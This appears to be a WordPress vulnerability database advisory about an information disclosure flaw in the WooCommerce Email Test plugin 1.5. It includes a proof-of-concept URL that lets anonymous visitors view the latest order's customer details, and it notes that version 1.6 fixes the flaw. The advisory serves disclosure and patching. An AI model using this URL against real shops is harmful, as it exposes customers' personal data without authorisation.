WooCommerce Email Test 1.5 - Order Information Disclosure



Description
When this plugin is installed, any anonymous user can open this url

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

..which shows the last (most recent) order along with all customer details, email address and cart content.

This is a severe security/data privacy breach and unlawful in (at least) germany.
Proof of Concept
Replace "domainname" with a domain to be tested:

https://www.domainname.de/?woocommerce_email_test=WC_Email_Customer_Completed_Order

Affects Plugin

fixed in version 1.6

References

URL https://plugins.trac.wordpress.org/changeset/1549532/woocommerce-email-test

Classification

Type BYPASS

Miscellaneous

Submitter jansass GmbH
Submitter Website www.jansass.com
Views 5764
Verified No
WPVDB ID 8689

Timeline

Publicly Published 2016-12-08 (almost 3 years ago)
Added 2016-12-09 (almost 3 years ago)
Last Updated 2019-11-01 (17 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin